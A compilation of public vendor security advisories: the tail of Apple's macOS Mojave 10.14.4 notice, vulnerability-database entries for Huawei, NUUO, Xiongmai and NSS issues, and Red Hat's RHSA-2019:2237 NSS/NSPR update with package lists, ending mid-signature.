Impact: A Mac may not lock when disconnecting from an external
monitor
Description: A lock handling issue was addressed with improved lock
handling.
CVE-2019-8533: an anonymous researcher, James Eagan of Télécom
ParisTech, R. Scott Kemp of MIT, Romke van Dijk of Z-CERT
IOHIDFamily
Available for: macOS Mojave 10.14.3
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team
IOKit
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8504: an anonymous researcher
IOKit SCSI
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-8529: Juwei Lin (@panicaII) of Trend Micro
Kernel
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A remote attacker may be able to cause unexpected system
termination or corrupt kernel memory
Description: A buffer overflow was addressed with improved size
validation.
CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6)
Kernel
Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.3
Impact: Mounting a maliciously crafted NFS network share may lead to
arbitrary code execution with system privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8508: Dr. Silvio Cesare of InfoSect
Kernel
Available for: macOS Mojave 10.14.3
Impact: An application may be able to gain elevated privileges
Description: A logic issue was addressed with improved state
management.
CVE-2019-8514: Samuel Groß of Google Project Zero
Kernel
Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.3
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8540: Weibo Wang (@ma1fan) of Qihoo 360 Nirvan Team
Kernel
Available for: macOS Mojave 10.14.3
Impact: A local user may be able to read kernel memory
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-7293: Ned Williamson of Google
Kernel
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A malicious application may be able to determine kernel
memory layout
Description: An out-of-bounds read issue existed that led to the
disclosure of kernel memory. This was addressed with improved input
validation.
CVE-2019-6207: Weibo Wang of Qihoo 360 Nirvan Team (@ma1fan)
CVE-2019-8510: Stefan Esser of Antid0te UG
Messages
Available for: macOS Mojave 10.14.3
Impact: A local user may be able to view sensitive user information
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2019-8546: ChiYuan Chang
Notes
Available for: macOS Mojave 10.14.3
Impact: A local user may be able to view a user's locked notes
Description: An access issue was addressed with improved memory
management.
CVE-2019-8537: Greg Walker (gregwalker.us)
PackageKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A logic issue was addressed with improved validation.
CVE-2019-8561: Jaron Bradley of Crowdstrike
Perl
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: Multiple issues in Perl
Description: Multiple issues in Perl were addressed in this update.
CVE-2018-12015: Jakub Wilk
CVE-2018-18311: Jayakrishna Menon
CVE-2018-18313: Eiichi Tsukata
Power Management
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to execute arbitrary code
with system privileges
Description: Multiple input validation issues existed in MIG
generated code. These issues were addressed with improved validation.
CVE-2019-8549: Mohamed Ghannam (@_simo36) of SSD Secure Disclosure
(ssd-disclosure.com)
QuartzCore
Available for: macOS Mojave 10.14.3
Impact: Processing malicious data may lead to unexpected application
termination
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2019-8507: Kai Lu or Fortinet's FortiGuard Labs
Security
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: An application may be able to gain elevated privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-8526: Linus Henze (pinauten.de)
Security
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8520: Antonio Groza, The UK's National Cyber Security Centre
(NCSC)
Siri
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to initiate a Dictation
request without user authorization
Description: An API issue existed in the handling of dictation
requests. This issue was addressed with improved validation.
CVE-2019-8502: Luke Deshotels of North Carolina State University,
Jordan Beichler of North Carolina State University, William Enck of
North Carolina State University, Costin Carabaș of University
POLITEHNICA of Bucharest, and Răzvan Deaconescu of University
POLITEHNICA of Bucharest
Time Machine
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A local user may be able to execute arbitrary shell commands
Description: This issue was addressed with improved checks.
CVE-2019-8513: CodeColorist of Ant-Financial LightYear Labs
TrueTypeScaler
Available for: macOS Mojave 10.14.3
Impact: Processing a maliciously crafted font may result in the
disclosure of process memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8517: riusksk of VulWar Corp working with Trend Micro Zero
Day Initiative
XPC
Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.3
Impact: A malicious application may be able to overwrite arbitrary
files
Description: This issue was addressed with improved checks.
CVE-2019-8530: CodeColorist of Ant-Financial LightYear Labs
Additional recognition
Accounts
We would like to acknowledge Milan Stute of Secure Mobile Networking
Lab at Technische Universität Darmstadt for their assistance.
Books
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Mail
We would like to acknowledge Craig Young of Tripwire VERT and Hanno
Böck for their assistance.
Time Machine
We would like to acknowledge CodeColorist of Ant-Financial LightYear
Labs for their assistance.
Installation note:
macOS Mojave 10.14.4, Security Update 2019-002 High Sierra,
Security Update 2019-002 Sierra may be obtained from the
Mac App Store or Apple's Software Downloads web site:
https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZWQgpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3E4zA/9
FvnChJHCmmH34DmCi+LGXO/fatCVVvvSHDWm1+bPjl8CeYcF+zZYACkQKxFoNpDT
vyiBJnNveCQEHeBvqSyRF8dfsTf4fr0MrFS1uIQVRPf2St6fZ27vDnC6fg269r0D
Eqnz0raFUa3bLUirteRMJwAqdGaVKwsNzM13qP4QEdrB14XkwZA0yQBunltFYU33
iAesKeejDLdhwkjfhmmjTlVPZmnABx2ZCfj2v7TiPxTOjfYbXcN8sY2LDHEOWNaM
ucrGBMfGH/ehStXAsIArwcLGOl6SI+6JywWVcm9lG6jUHSeSk9BPF6R4JzGrEHZB
sSo87+U8b63KA2GkYecwh6xvE5EchQku/fj0d2zbOlg+T2bMbyc6Al2nefsYnX5p
7BuhdZxqq3m3Gme2qRY0eye6wch1BTHhK+zctrVH2XeMaUpeanopVRI8AD+hZJ1J
+9oQX8kSa7hzJYPmohA4Wi/Rp9FpKpgXYNBn1A9DgSAvf+eyfWJX0aZXmQZfn/k7
OLz3EmSKvXv0i67L9g2XYeX7GFBMqf4xWeztKLUYFafu73t1mTxZJICcYeTxebS0
zBJdkOHwP9GxsSonblDgPScQPdW85l0fangn7qqiexCVp4JsCGBc0Wuy1lc+MyzS
1YmrDRhRl4aYOf4UGgtKI6ncvM77Y30ECPV3A6vl+wk=
=QV0f
-----END PGP SIGNATURE-----
| VAR-201812-0944 | CVE-2018-7956 | plural Huawei In product Access control vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
Huawei VIP App is a mobile app for Malaysia customers that purchased P20 Series, Nova 3/3i and Mate 20. There is a vulnerability in versions before 4.0.5 that attackers can conduct bruteforce to the VIP App Web Services to get user information. plural Huawei In product Contains an access control vulnerability.Information may be obtained. Huawei VIP App is a pre-installed membership service application for mobile phones of China Huawei (Huawei)
| VAR-201811-0051 | CVE-2018-15716 |
NUUO NVRMini2 In OS Command injection vulnerability
Related entries in the VARIoT exploits database: VAR-E-201812-0167, VAR-E-201812-0168 |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
NUUO NVRMini2 version 3.9.1 is vulnerable to authenticated remote command injection. An attacker can send crafted requests to upgrade_handle.php to execute OS commands as root. NUUO NVRMini2 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NUUO NVRmini Products are prone to an remote command-injection vulnerability.
An attacker may exploit this issue to inject and execute arbitrary commands within the context of the affected application; this may aid in further attacks.
NOTE: This issue is the result of an incomplete fix for the issue described in BID 106058 (NUUO NVRmini Products CVE-2018-14933 Remote Command Injection Vulnerability). NUUO NVRMini2 is a small network DVR device from NUUO
| VAR-201811-1128 | No CVE | XM-JPE13-2R 960P and XM-JPR13-R (OL) have information disclosure vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The XM-JPE13-2R 960P is a high-definition night vision wireless intelligent surveillance camera. Xiongmai XM-JPR13-R (OL) is a 960P fisheye panoramic intelligent PTZ surveillance camera.
The XM-JPE13-2R 960P and the XM-JPR13-R (OL) have information disclosure vulnerabilities. Attackers can use the vulnerability's built-in account to remotely view videos and modify camera configurations.
| VAR-201905-0799 | CVE-2018-12404 | NSS Cryptographic vulnerability |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
A cached side channel attack during handshakes using RSA encryption could allow for the decryption of encrypted content. This is a variant of the Adaptive Chosen Ciphertext attack (AKA Bleichenbacher attack) and affects all NSS versions prior to NSS 3.41. NSS Contains a cryptographic vulnerability.Information may be obtained. Mozilla Network Security Services is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: nss, nss-softokn, nss-util, and nspr security, bug fix, and enhancement update
Advisory ID: RHSA-2019:2237-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2019:2237
Issue date: 2019-08-06
CVE Names: CVE-2018-0495 CVE-2018-12404
====================================================================
1. Summary:
An update for nss, nss-softokn, nss-util, and nspr is now available for Red
Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
Network Security Services (NSS) is a set of libraries designed to support
the cross-platform development of security-enabled client and server
applications.
Netscape Portable Runtime (NSPR) provides platform independence for non-GUI
operating system facilities.
The following packages have been upgraded to a later upstream version: nss
(3.44.0), nss-softokn (3.44.0), nss-util (3.44.0), nspr (4.21.0).
(BZ#1645231, BZ#1692269, BZ#1692271, BZ#1692274)
Security Fix(es):
* ROHNP: Key Extraction Side Channel in Multiple Crypto Libraries
(CVE-2018-0495)
* nss: Cache side-channel variant of the Bleichenbacher attack
(CVE-2018-12404)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 7.7 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing this update, applications using nss or nspr (for example,
Firefox) must be restarted for this update to take effect.
5. Bugs fixed (https://bugzilla.redhat.com/):
1144186 - Cannot delete orphan private keys with certutil.
1212132 - Support for IKE/IPsec typical PKIX usage so libreswan can use nss without rejecting certs based on EKU
1431241 - Fully implement verification of RSA-PSS keys in certificates in tstclnt and selfserv [rhel-7]
1444136 - move NSS signtool to the unsupported tools in RHEL 7.6
1455288 - TLS 1.3 handshake fails with SSL_REQUIRE_SAFE_NEGOTIATION on
1508571 - Exporting RSA-PSS keys to PKCS#12 drops the rsa-pss identifier from them [rhel-7]
1508595 - Regression in handling unknown signature algorithms extensions
1509045 - selfserv refuses to use rsa-pss keys [rhel-7]
1509396 - RFC 5246 non compliance with CertificateVerify fallback to SHA-1 [rhel-7]
1510156 - RSA PKCS#1 v1.5 signatures made using rsa-pss keys are accepted as valid [rhel-7]
1514041 - certutil -O output isn't precise when the input is an ambiguous nickname used by multiple certificates
1533729 - [RFE] certutil capability: generate CSR from orphan private key
1538081 - Policy does not apply to MGF1 hash in RSA-PSS signatures [rhel-7]
1591163 - CVE-2018-0495 ROHNP: Key Extraction Side Channel in Multiple Crypto Libraries
1639873 - mod_nss - TLS Session ID is still not maintained (ref bz 1461580)
1657164 - `certutil -u I` is not documented
1657913 - CVE-2018-12404 nss: Cache side-channel variant of the Bleichenbacher attack
1670239 - libpkix name constraints check treats CN as DNS name when it should not
1712876 - post handshake authentication with selfserv does not work if SSL_ENABLE_SESSION_TICKETS is set [rhel-7]
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
nspr-4.21.0-1.el7.src.rpm
nss-3.44.0-4.el7.src.rpm
nss-softokn-3.44.0-5.el7.src.rpm
nss-util-3.44.0-3.el7.src.rpm
x86_64:
nspr-4.21.0-1.el7.i686.rpm
nspr-4.21.0-1.el7.x86_64.rpm
nspr-debuginfo-4.21.0-1.el7.i686.rpm
nspr-debuginfo-4.21.0-1.el7.x86_64.rpm
nss-3.44.0-4.el7.i686.rpm
nss-3.44.0-4.el7.x86_64.rpm
nss-debuginfo-3.44.0-4.el7.i686.rpm
nss-debuginfo-3.44.0-4.el7.x86_64.rpm
nss-softokn-3.44.0-5.el7.i686.rpm
nss-softokn-3.44.0-5.el7.x86_64.rpm
nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm
nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm
nss-softokn-freebl-3.44.0-5.el7.i686.rpm
nss-softokn-freebl-3.44.0-5.el7.x86_64.rpm
nss-sysinit-3.44.0-4.el7.x86_64.rpm
nss-tools-3.44.0-4.el7.x86_64.rpm
nss-util-3.44.0-3.el7.i686.rpm
nss-util-3.44.0-3.el7.x86_64.rpm
nss-util-debuginfo-3.44.0-3.el7.i686.rpm
nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
nspr-debuginfo-4.21.0-1.el7.i686.rpm
nspr-debuginfo-4.21.0-1.el7.x86_64.rpm
nspr-devel-4.21.0-1.el7.i686.rpm
nspr-devel-4.21.0-1.el7.x86_64.rpm
nss-debuginfo-3.44.0-4.el7.i686.rpm
nss-debuginfo-3.44.0-4.el7.x86_64.rpm
nss-devel-3.44.0-4.el7.i686.rpm
nss-devel-3.44.0-4.el7.x86_64.rpm
nss-pkcs11-devel-3.44.0-4.el7.i686.rpm
nss-pkcs11-devel-3.44.0-4.el7.x86_64.rpm
nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm
nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm
nss-softokn-devel-3.44.0-5.el7.i686.rpm
nss-softokn-devel-3.44.0-5.el7.x86_64.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.i686.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.x86_64.rpm
nss-util-debuginfo-3.44.0-3.el7.i686.rpm
nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm
nss-util-devel-3.44.0-3.el7.i686.rpm
nss-util-devel-3.44.0-3.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
nspr-4.21.0-1.el7.src.rpm
nss-3.44.0-4.el7.src.rpm
nss-softokn-3.44.0-5.el7.src.rpm
nss-util-3.44.0-3.el7.src.rpm
x86_64:
nspr-4.21.0-1.el7.i686.rpm
nspr-4.21.0-1.el7.x86_64.rpm
nspr-debuginfo-4.21.0-1.el7.i686.rpm
nspr-debuginfo-4.21.0-1.el7.x86_64.rpm
nss-3.44.0-4.el7.i686.rpm
nss-3.44.0-4.el7.x86_64.rpm
nss-debuginfo-3.44.0-4.el7.i686.rpm
nss-debuginfo-3.44.0-4.el7.x86_64.rpm
nss-softokn-3.44.0-5.el7.i686.rpm
nss-softokn-3.44.0-5.el7.x86_64.rpm
nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm
nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm
nss-softokn-freebl-3.44.0-5.el7.i686.rpm
nss-softokn-freebl-3.44.0-5.el7.x86_64.rpm
nss-sysinit-3.44.0-4.el7.x86_64.rpm
nss-tools-3.44.0-4.el7.x86_64.rpm
nss-util-3.44.0-3.el7.i686.rpm
nss-util-3.44.0-3.el7.x86_64.rpm
nss-util-debuginfo-3.44.0-3.el7.i686.rpm
nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
nspr-debuginfo-4.21.0-1.el7.i686.rpm
nspr-debuginfo-4.21.0-1.el7.x86_64.rpm
nspr-devel-4.21.0-1.el7.i686.rpm
nspr-devel-4.21.0-1.el7.x86_64.rpm
nss-debuginfo-3.44.0-4.el7.i686.rpm
nss-debuginfo-3.44.0-4.el7.x86_64.rpm
nss-devel-3.44.0-4.el7.i686.rpm
nss-devel-3.44.0-4.el7.x86_64.rpm
nss-pkcs11-devel-3.44.0-4.el7.i686.rpm
nss-pkcs11-devel-3.44.0-4.el7.x86_64.rpm
nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm
nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm
nss-softokn-devel-3.44.0-5.el7.i686.rpm
nss-softokn-devel-3.44.0-5.el7.x86_64.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.i686.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.x86_64.rpm
nss-util-debuginfo-3.44.0-3.el7.i686.rpm
nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm
nss-util-devel-3.44.0-3.el7.i686.rpm
nss-util-devel-3.44.0-3.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
nspr-4.21.0-1.el7.src.rpm
nss-3.44.0-4.el7.src.rpm
nss-softokn-3.44.0-5.el7.src.rpm
nss-util-3.44.0-3.el7.src.rpm
ppc64:
nspr-4.21.0-1.el7.ppc.rpm
nspr-4.21.0-1.el7.ppc64.rpm
nspr-debuginfo-4.21.0-1.el7.ppc.rpm
nspr-debuginfo-4.21.0-1.el7.ppc64.rpm
nspr-devel-4.21.0-1.el7.ppc.rpm
nspr-devel-4.21.0-1.el7.ppc64.rpm
nss-3.44.0-4.el7.ppc.rpm
nss-3.44.0-4.el7.ppc64.rpm
nss-debuginfo-3.44.0-4.el7.ppc.rpm
nss-debuginfo-3.44.0-4.el7.ppc64.rpm
nss-devel-3.44.0-4.el7.ppc.rpm
nss-devel-3.44.0-4.el7.ppc64.rpm
nss-softokn-3.44.0-5.el7.ppc.rpm
nss-softokn-3.44.0-5.el7.ppc64.rpm
nss-softokn-debuginfo-3.44.0-5.el7.ppc.rpm
nss-softokn-debuginfo-3.44.0-5.el7.ppc64.rpm
nss-softokn-devel-3.44.0-5.el7.ppc.rpm
nss-softokn-devel-3.44.0-5.el7.ppc64.rpm
nss-softokn-freebl-3.44.0-5.el7.ppc.rpm
nss-softokn-freebl-3.44.0-5.el7.ppc64.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.ppc.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.ppc64.rpm
nss-sysinit-3.44.0-4.el7.ppc64.rpm
nss-tools-3.44.0-4.el7.ppc64.rpm
nss-util-3.44.0-3.el7.ppc.rpm
nss-util-3.44.0-3.el7.ppc64.rpm
nss-util-debuginfo-3.44.0-3.el7.ppc.rpm
nss-util-debuginfo-3.44.0-3.el7.ppc64.rpm
nss-util-devel-3.44.0-3.el7.ppc.rpm
nss-util-devel-3.44.0-3.el7.ppc64.rpm
ppc64le:
nspr-4.21.0-1.el7.ppc64le.rpm
nspr-debuginfo-4.21.0-1.el7.ppc64le.rpm
nspr-devel-4.21.0-1.el7.ppc64le.rpm
nss-3.44.0-4.el7.ppc64le.rpm
nss-debuginfo-3.44.0-4.el7.ppc64le.rpm
nss-devel-3.44.0-4.el7.ppc64le.rpm
nss-softokn-3.44.0-5.el7.ppc64le.rpm
nss-softokn-debuginfo-3.44.0-5.el7.ppc64le.rpm
nss-softokn-devel-3.44.0-5.el7.ppc64le.rpm
nss-softokn-freebl-3.44.0-5.el7.ppc64le.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.ppc64le.rpm
nss-sysinit-3.44.0-4.el7.ppc64le.rpm
nss-tools-3.44.0-4.el7.ppc64le.rpm
nss-util-3.44.0-3.el7.ppc64le.rpm
nss-util-debuginfo-3.44.0-3.el7.ppc64le.rpm
nss-util-devel-3.44.0-3.el7.ppc64le.rpm
s390x:
nspr-4.21.0-1.el7.s390.rpm
nspr-4.21.0-1.el7.s390x.rpm
nspr-debuginfo-4.21.0-1.el7.s390.rpm
nspr-debuginfo-4.21.0-1.el7.s390x.rpm
nspr-devel-4.21.0-1.el7.s390.rpm
nspr-devel-4.21.0-1.el7.s390x.rpm
nss-3.44.0-4.el7.s390.rpm
nss-3.44.0-4.el7.s390x.rpm
nss-debuginfo-3.44.0-4.el7.s390.rpm
nss-debuginfo-3.44.0-4.el7.s390x.rpm
nss-devel-3.44.0-4.el7.s390.rpm
nss-devel-3.44.0-4.el7.s390x.rpm
nss-softokn-3.44.0-5.el7.s390.rpm
nss-softokn-3.44.0-5.el7.s390x.rpm
nss-softokn-debuginfo-3.44.0-5.el7.s390.rpm
nss-softokn-debuginfo-3.44.0-5.el7.s390x.rpm
nss-softokn-devel-3.44.0-5.el7.s390.rpm
nss-softokn-devel-3.44.0-5.el7.s390x.rpm
nss-softokn-freebl-3.44.0-5.el7.s390.rpm
nss-softokn-freebl-3.44.0-5.el7.s390x.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.s390.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.s390x.rpm
nss-sysinit-3.44.0-4.el7.s390x.rpm
nss-tools-3.44.0-4.el7.s390x.rpm
nss-util-3.44.0-3.el7.s390.rpm
nss-util-3.44.0-3.el7.s390x.rpm
nss-util-debuginfo-3.44.0-3.el7.s390.rpm
nss-util-debuginfo-3.44.0-3.el7.s390x.rpm
nss-util-devel-3.44.0-3.el7.s390.rpm
nss-util-devel-3.44.0-3.el7.s390x.rpm
x86_64:
nspr-4.21.0-1.el7.i686.rpm
nspr-4.21.0-1.el7.x86_64.rpm
nspr-debuginfo-4.21.0-1.el7.i686.rpm
nspr-debuginfo-4.21.0-1.el7.x86_64.rpm
nspr-devel-4.21.0-1.el7.i686.rpm
nspr-devel-4.21.0-1.el7.x86_64.rpm
nss-3.44.0-4.el7.i686.rpm
nss-3.44.0-4.el7.x86_64.rpm
nss-debuginfo-3.44.0-4.el7.i686.rpm
nss-debuginfo-3.44.0-4.el7.x86_64.rpm
nss-devel-3.44.0-4.el7.i686.rpm
nss-devel-3.44.0-4.el7.x86_64.rpm
nss-softokn-3.44.0-5.el7.i686.rpm
nss-softokn-3.44.0-5.el7.x86_64.rpm
nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm
nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm
nss-softokn-devel-3.44.0-5.el7.i686.rpm
nss-softokn-devel-3.44.0-5.el7.x86_64.rpm
nss-softokn-freebl-3.44.0-5.el7.i686.rpm
nss-softokn-freebl-3.44.0-5.el7.x86_64.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.i686.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.x86_64.rpm
nss-sysinit-3.44.0-4.el7.x86_64.rpm
nss-tools-3.44.0-4.el7.x86_64.rpm
nss-util-3.44.0-3.el7.i686.rpm
nss-util-3.44.0-3.el7.x86_64.rpm
nss-util-debuginfo-3.44.0-3.el7.i686.rpm
nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm
nss-util-devel-3.44.0-3.el7.i686.rpm
nss-util-devel-3.44.0-3.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
nss-debuginfo-3.44.0-4.el7.ppc.rpm
nss-debuginfo-3.44.0-4.el7.ppc64.rpm
nss-pkcs11-devel-3.44.0-4.el7.ppc.rpm
nss-pkcs11-devel-3.44.0-4.el7.ppc64.rpm
ppc64le:
nss-debuginfo-3.44.0-4.el7.ppc64le.rpm
nss-pkcs11-devel-3.44.0-4.el7.ppc64le.rpm
s390x:
nss-debuginfo-3.44.0-4.el7.s390.rpm
nss-debuginfo-3.44.0-4.el7.s390x.rpm
nss-pkcs11-devel-3.44.0-4.el7.s390.rpm
nss-pkcs11-devel-3.44.0-4.el7.s390x.rpm
x86_64:
nss-debuginfo-3.44.0-4.el7.i686.rpm
nss-debuginfo-3.44.0-4.el7.x86_64.rpm
nss-pkcs11-devel-3.44.0-4.el7.i686.rpm
nss-pkcs11-devel-3.44.0-4.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
nspr-4.21.0-1.el7.src.rpm
nss-3.44.0-4.el7.src.rpm
nss-softokn-3.44.0-5.el7.src.rpm
nss-util-3.44.0-3.el7.src.rpm
x86_64:
nspr-4.21.0-1.el7.i686.rpm
nspr-4.21.0-1.el7.x86_64.rpm
nspr-debuginfo-4.21.0-1.el7.i686.rpm
nspr-debuginfo-4.21.0-1.el7.x86_64.rpm
nspr-devel-4.21.0-1.el7.i686.rpm
nspr-devel-4.21.0-1.el7.x86_64.rpm
nss-3.44.0-4.el7.i686.rpm
nss-3.44.0-4.el7.x86_64.rpm
nss-debuginfo-3.44.0-4.el7.i686.rpm
nss-debuginfo-3.44.0-4.el7.x86_64.rpm
nss-devel-3.44.0-4.el7.i686.rpm
nss-devel-3.44.0-4.el7.x86_64.rpm
nss-softokn-3.44.0-5.el7.i686.rpm
nss-softokn-3.44.0-5.el7.x86_64.rpm
nss-softokn-debuginfo-3.44.0-5.el7.i686.rpm
nss-softokn-debuginfo-3.44.0-5.el7.x86_64.rpm
nss-softokn-devel-3.44.0-5.el7.i686.rpm
nss-softokn-devel-3.44.0-5.el7.x86_64.rpm
nss-softokn-freebl-3.44.0-5.el7.i686.rpm
nss-softokn-freebl-3.44.0-5.el7.x86_64.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.i686.rpm
nss-softokn-freebl-devel-3.44.0-5.el7.x86_64.rpm
nss-sysinit-3.44.0-4.el7.x86_64.rpm
nss-tools-3.44.0-4.el7.x86_64.rpm
nss-util-3.44.0-3.el7.i686.rpm
nss-util-3.44.0-3.el7.x86_64.rpm
nss-util-debuginfo-3.44.0-3.el7.i686.rpm
nss-util-debuginfo-3.44.0-3.el7.x86_64.rpm
nss-util-devel-3.44.0-3.el7.i686.rpm
nss-util-devel-3.44.0-3.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
nss-debuginfo-3.44.0-4.el7.i686.rpm
nss-debuginfo-3.44.0-4.el7.x86_64.rpm
nss-pkcs11-devel-3.44.0-4.el7.i686.rpm
nss-pkcs11-devel-3.44.0-4.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2018-0495
https://access.redhat.com/security/cve/CVE-2018-12404
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBXUl2i9zjgjWX9erEAQgsZg//RYLUdEWlARE9jDIOZakUKoDGisG1+EU8
JJeTAGqksGTHEAgRpfOsYcM/uIuMXfBJmE1Gr6++KQteUhIT1aKTqbf3sdSM0fPo
97CYjcRXejluoO45Kmw7C4o9NN2MAeoEpykFQJyqM0gLIOu+thhMzViFUEEDf5YA
jhOrkRw/xLJPhXkiUFcjBywMNsqi4TEHBKU3e+YgAUSBe2p6LaEbGJGnoFMBiskM
1mNqCmQHs0Q7yPE8F3wOXIve+CeZvvJlJQ10a9YLSM6tkUuf6KwqSEC0F8vLOnSF
6gpZZKXJgc70sTCJ0Eym82CHQD6kdzUBhN071P+wRX66fYai7CnbnuY77o2HVRRr
gT0QbDrlhldxZ0DLbu81DjgmheYUhv5alY6MR/M5BcBU+MNokEgH7a00go6cbfKE
q0kJCTpJpQN4y6t+0Tb6alXYdGLvae9QW85TxWzkYlV2uUxZEegkX07AI9XFpeCN
Yr8PjJuMy2HbrB+OAFb/gSm2kC/v37mpIxVQr4HCWcqheKIOsoF/pBELrTJe9ON4
